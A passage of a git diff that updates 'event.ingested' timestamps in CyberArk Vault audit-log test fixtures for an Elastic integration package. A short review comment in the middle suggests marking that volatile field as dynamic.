", + "ingested": "2021-12-09T13:37:01.193677300Z", + "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json index f1dcee5a31a..3fecfee889a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json 
@@ -58,7 +58,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024603900Z", + "ingested": "2021-12-09T13:37:03.416577Z", "original": "\u003c5\u003e1 2021-03-11T16:31:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:13\",\"IsoTimestamp\":\"2021-03-11T16:31:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 
90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
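Review bot: The only change in the `@@ -58,7 +58,7 @@` hunk is `event.ingested` (`"2021-06-09T10:24:35.024603900Z"` → `"2021-12-09T13:37:03.416577Z"`), a wall-clock value that will differ on every regeneration of this expected file and is repeated across the following hunks, burying real changes such as the IP substitution in the same PR under timestamp churn. If the package's pipeline test configuration supports excluding volatile fields from comparison (elastic-package's `dynamic_fields` setting, e.g. `dynamic_fields: { event.ingested: ".*" }` in the test config), marking `event.ingested` that way would keep these fixtures stable — I have not verified which elastic-package version this package targets, so treat that as a suggestion to confirm. The enclosing event object starts and ends outside this hunk.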
@@ -122,7 +122,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024616700Z", + "ingested": "2021-12-09T13:37:03.416585700Z", "original": "\u003c5\u003e1 2021-03-11T16:31:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:23\",\"IsoTimestamp\":\"2021-03-11T16:31:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024619600Z", + "ingested": "2021-12-09T13:37:03.416591300Z", "original": "\u003c5\u003e1 2021-03-11T19:40:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:40:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:40:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:40:52\",\"IsoTimestamp\":\"2021-03-11T19:40:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -250,7 +250,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024622Z", + "ingested": "2021-12-09T13:37:03.416596700Z", "original": "\u003c5\u003e1 2021-03-14T12:04:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:35\",\"IsoTimestamp\":\"2021-03-14T12:04:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; 
PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
